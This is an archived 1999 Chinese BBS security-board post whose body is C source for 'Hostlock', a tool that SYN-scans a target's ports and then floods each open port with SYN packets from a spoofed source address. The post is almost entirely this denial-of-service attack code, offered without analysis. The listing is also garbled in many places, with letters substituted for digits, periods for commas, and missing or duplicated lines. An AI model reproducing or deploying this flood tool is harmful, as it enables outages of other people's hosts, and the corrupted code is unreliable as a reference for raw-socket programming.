📄 353.htm
字号:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="343.htm">上一层</a>][<a href="354.htm">下一篇</a>]
<hr><p align="left"><small>发信人: biff (大可), 信区: Security <br>
标 题: syn.c <br>
发信站: 武汉白云黄鹤站 (Sun Jun 13 14:44:14 1999), 站内信件 <br>
<br>
<br>
#include <stdio.h> <br>
#include <stdlib.h> <br>
#include <string.h> <br>
#include <unistd.h> <br>
<br>
#include <sys/types.h> <br>
#include <sys/socket.h> <br>
<br>
#include <netinet/in.h> <br>
#include <netinet/in_systm.h> <br>
#include <netinet/ip.h> <br>
#include <netinet/tcp.h> <br>
#include <netinet/protocols.h> <br>
<br>
#include <arpa/inet.h> <br>
#include <netdb.h> <br>
<br>
#define PACKET_SIZE sizeof(struct tcppkt) <br>
<br>
/* Configurable defaults. These are specifiable via the command line. */ <br>
#define DEF_BADDF "l32.45.6.8" <br>
#define DEF_SYNS 32 <br>
#define DEF_MAX 32768 /* (See Accompanying Table) */ <br>
#define DEF_LOW <br>
<br>
struct tcppkt { <br>
struct iphdr ip; <br>
struct tcphdr tcp; <br>
}; <br>
<br>
unsigned short ports[DEF_MAX]; <br>
<br>
void <br>
usage(progname) <br>
char *progname; <br>
{ <br>
fprintf(stderr, "Hostlock v.0l\n"); <br>
fprintf(stderr, "Usage: %s <Target> [options]\n", progname); <br>
fprintf(stderr, "Options:\n\ <br>
-b [addr]\tAddress from which the SYNflood packets should appear to be.\n\ <br>
\t\tThis address should have correct routing records, but not exlst.\n\ <br>
-l [port]\tPort to begin scanning from.\n\ <br>
-h [port]\tPort to end scanning on.\n\ <br>
-d [port]\tSpecific port to flood.\n\ <br>
-n [syns]\tNumber of SYN packets to flood with.\n"); <br>
<br>
exit(1); <br>
} <br>
<br>
unsigned long <br>
resolve(host) <br>
char *host; <br>
{ <br>
struct hostent *he; <br>
u_long addr; <br>
<br>
if( (he = gethostbyname(host)) == NULL) { <br>
addr = inet_addr(host); <br>
} else { <br>
bcopy(*(he->h_addr_list), &(addr), sizeof(he->h_addr_list)); <br>
} <br>
return(addr); <br>
} <br>
<br>
/* From ping.c */ <br>
/* <br>
*in cksum - <br>
* Checksum routine for Internet Protocol family headers (C Version) <br>
*/ <br>
unsigned short in_cksum(addr, len) <br>
u_short *addr <br>
int len; <br>
{ <br>
register int nleft = len; <br>
register u_short *w = addr; <br>
register int sum = 0; <br>
u_short answer = 0; <br>
<br>
while (nleft > l) { <br>
sum += *w++; <br>
nleft -= 2; <br>
} <br>
<br>
if (nleft == l) { <br>
*(u_char *)(&answer) = *(u_char *)w ; <br>
sum += answer; <br>
} <br>
<br>
sum = (sum >> l6) + (sum & 0xffff); <br>
sum += (sum >> l6); <br>
answer = -sum; <br>
return(answer); <br>
} <br>
<br>
int <br>
sendsyn(sin, s, saddr, sport, seq) <br>
struct sockaddr_in *sin; <br>
u_long saddr, seq; <br>
u_short sport; <br>
int s; <br>
{ <br>
register struct iphdr *ip; <br>
register struct tcphdr *tcp; <br>
register char *php; <br>
static char packet[PACKET_SIZE]; <br>
static char phead[PACKET_SIZE + l2]; <br>
u_short len = 0; <br>
<br>
/* Overlay IP header structure onto packet. */ <br>
ip = (struct iphdr *)packet; <br>
<br>
/* Fill in IP Header values. */ <br>
ip->ihl = 5; <br>
ip->version = 4; <br>
ip->tos = 0; <br>
ip->tot_len = htons(PACKET_SIZE) <br>
ip->id = htons(2600 + (rand()%32768)); <br>
ip->frag_off = 0; <br>
ip->ttl = 255; <br>
ip->protocol = IPPROTO_TCP; <br>
ip->check = 0; <br>
ip->saddr = saddr; <br>
ip->daddr = sin->sin_addr.s_addr; <br>
<br>
/* The Linux kernel automatically checksums outgoing raw packets. <br>
* however, other implementations might not, so if you are porting, <br>
* remember to uncomment this line. <br>
* ip->check = in_cksum((char *)&ip, sizeof(struct iphdr)); <br>
*/ <br>
<br>
/* Overlay TCP Header structure onto packet. */ <br>
<br>
tcp = (struct tcphdr *)(packet + sizeof(struct iphdr)); <br>
<br>
/* Fill in TCP Header values. */ <br>
tcp->th_sport = htons (sport); <br>
tcp->th_dport = htons (sin->sin_port); <br>
tcp->th_seq = htonl(seq); <br>
tcp->th_ack = 0; <br>
tcp->th_x2 = 0; <br>
tcp->th_off = 5; <br>
tcp->th_flags = TH_SYN; <br>
tcp->th_win = htons(l0052); <br>
tcp->th_sum = 0; <br>
tcp->th_urp = 0; <br>
<br>
php = phead; <br>
memset(php, 0, PACKET_SIZE + l2); <br>
memcpy(php, &(ip->saddr), 8); <br>
php += 9; <br>
php += 9; <br>
memcpy(php, &(ip->protocol), l); <br>
len = htons(sizeof(struct tcphdr)); <br>
memcpy(++php, &(len), 2); <br>
php += 2; <br>
memcpy(php, tcp. sizeof(struct tcphdr)); <br>
<br>
/* Now fill in the checksum. */ <br>
tcp->th_sum = in_cksum(php, sizeof(struct tcphdr)+l2); <br>
<br>
/* And send... */ <br>
return(sendto(s, packet, PACKET_SIZE, 0, (struct sockaddr *)sin <br>
sizeof(struct sockaddr_in))); <br>
} <br>
<br>
int <br>
synscan(saddr, sport, lo, hi, s, r, sin) <br>
u_long saddr; <br>
u_short sport, lo, hi; <br>
int s, r; <br>
struct sockaddr_in *sin; <br>
{ <br>
struct tcppkt buf; <br>
int i, total = 0; <br>
<br>
for(i = lo ; i <= hi ; i++) { <br>
sin->sin_port = i; <br>
if( (sendsyn(sin, s, saddr, sport, 3l337)) == -l) { <br>
perror("Error sending SYN packet"); <br>
exit(l); <br>
} <br>
<br>
for(;;) { <br>
memset(&buf, 0, PACKET_SIZE); <br>
read(r, &buf, PACKET_SIZE); <br>
/* Is it from our target? */ <br>
if( buf.ip.saddr != sin->sin_addr.s_addr ) continue; <br>
<br>
/* Sequence number ok? */ <br>
if( (ntohl(buf.tcp.th_ack) != 3l338) && <br>
(ntohl(buf.tcp.th_ack) != 3l337)) continue; <br>
<br>
/* RST/ACK - No service listening on port. */ <br>
if( (buf.tcp.th_flags & TH_RST) && <br>
(buf.tcp.th flags & TH_ACK)) break; <br>
<br>
/* SYN/ACK - Service listening on port. */ <br>
if( (buf.tcp.th_flags & TH_ACK) && <br>
(buf.tcp.th_flags & TH_SYN)) { <br>
ports[total] = ntohs(buf.tcp.th_sport); <br>
printf("%d\n", ports[total++]); <br>
fflush(stdout); <br>
break; <br>
<br>
} <br>
<br>
} /* for(;;) */ <br>
} <br>
return(total); <br>
} <br>
<br>
void <br>
synflood(baddr, bport, s. numsyns, sin) <br>
u_long baddr; <br>
u_short bport, numsyns; <br>
int s; <br>
struct sockaddr_in *sin; <br>
{ <br>
int i; <br>
<br>
printf("%d", sin->sin_port); <br>
fflush(stdout); <br>
<br>
for(i = 0 ; i < numsyns ; i++) { <br>
usleep(30); <br>
if( (sendsyn(sin, s. baddr, bport++, 3l337)) == -l) { <br>
perror("Error sending SYN packet"); <br>
exit(l); <br>
} <br>
printf(","); <br>
fflush(stdout); <br>
} <br>
printf("\n"); <br>
} <br>
<br>
void <br>
main(argc, argv) <br>
int argv; <br>
char **argv; <br>
char **argv; <br>
{ <br>
struct sockaddr_in sin; <br>
u_long saddr, daddr, baddr; <br>
u_short i, numsyns, lo, hi; <br>
u_short sport = 2600, bport = 2600; <br>
char buf[256]; <br>
int s, r, total; <br>
<br>
total = numsyns = lo = hi = baddr = 0; <br>
<br>
/* Minimum usage is "hostlock <target>" */ <br>
if(argc < 2) usage(argv[0]); <br>
<br>
if( (daddr = resolve(argv[l])) == -l) { <br>
fprintf(stderr, "Bad hostname/ip address: %s\n", argv[l]); <br>
usage(argv[0]); <br>
} <br>
<br>
for(i = 2 ; i < argc ; i ++) { <br>
switch(argv[i][l]) { <br>
case 'b': case 'B': <br>
if( (baddr = inet_addr(argv[++i])) == -l) { <br>
fprintf(stderr, "Bad hostname/ip address: %s\n", argv[l]); <br>
fprintf(stderr, "Defaulting to %s...\n", (DEF_BADDR); <br>
baddr = inet_addr(DEF_BADDR); <br>
} <br>
break; <br>
case 'l': case 'L': <br>
lo = atoi(argv[++i]); <br>
break; <br>
case 'h': case 'H': <br>
hi = atoi(argv[++i]); <br>
break; <br>
case 'd': case 'D': <br>
hi = lo = atoi(argv[++i]); <br>
break; <br>
case 'n': case 'N': <br>
numsyns = atoi(argv[++i]); <br>
break; <br>
default: <br>
fprintf(stderr, "Unknown option: -%c\n", argv[i][l]); <br>
usage(argv[0]); <br>
break; <br>
} <br>
} <br>
} <br>
<br>
/* Institute defaults if these options have not been specified. */ <br>
if(!numsyns) numsyns = DEF_SYNS; <br>
if(!lo) lo = DEF_LOW; <br>
if(!hi) hi = DEF MAX; <br>
if(!baddr) baddr = inet_addr(DEF_BADDR); <br>
<br>
/* Fill in our sockaddr_in structure. */ <br>
sin.sin_family = PF_INET; <br>
sin.sin addr.s_addr = daddr; <br>
sin.sin port = 0; <br>
<br>
if( (gethostname(buf. 256)) == -l) { <br>
perror("Unable to get our hostname"); <br>
exit(l); <br>
} <br>
<br>
if( (saddr = resolve(buf)) == -l) { <br>
perror("Unable to resolve our hostname"); <br>
exit(l); <br>
} <br>
} <br>
<br>
/* Open our sending and receiving sockets. */ <br>
if( (s = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { <br>
perror("Unable to open a raw socket"); <br>
exit(l); <br>
} <br>
<br>
if( (r = socket(PF_INET, SOCK RAW, IPPROTO_TCP)) < 0) { <br>
perror("Unable to open a raw socket"); <br>
exit(l); <br>
} <br>
<br>
printf("Performing hostlock on %s ports %d to %d. \n", <br>
inet_ntoa(sin.sin_addr), lo, hi); <br>
<br>
/* Scan. */ <br>
printf("Scanning...\n"); <br>
fflush(stdout); <br>
total = synscan(saddr, sport, lo. hi, s, r, &sin); <br>
<br>
printf("Scan completed. %d receiving ports found.\n", total); <br>
printf("Flooding ports with %d SYNs each...\n", numsyns); <br>
fflush(stdout); <br>
/* Flood. */ <br>
if( total ) { <br>
for(i = 0 ; i < total ; i++) { <br>
sin.sin port = ports[i]; <br>
synflood(baddr, bport, s, numsyns, &sin); <br>
} <br>
} <br>
printf("Hostlock completed. Exiting.\n"); <br>
exit(0); <br>
} <br>
-- <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="343.htm">上一层</a>][<a href="354.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -